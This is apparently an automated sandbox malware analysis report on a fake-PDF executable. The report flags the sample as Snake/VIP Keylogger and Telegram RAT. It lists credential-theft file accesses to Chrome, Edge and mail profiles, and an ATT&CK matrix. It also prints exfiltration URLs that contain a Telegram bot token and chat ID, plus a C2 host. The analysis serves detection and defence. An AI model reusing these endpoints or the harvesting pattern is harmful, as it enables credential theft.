Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe

Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403532

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Beskftigelsesmssiges.exe PID: 7852, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Beskftigelsesmssiges.exe PID: 7852, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Beskftigelsesmssiges.exe PID: 7852, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	116 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 Software Packing	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
678763_PDF.exe	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	16%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.129	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.228	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DBD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.228$	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C47000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D91000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	false	high
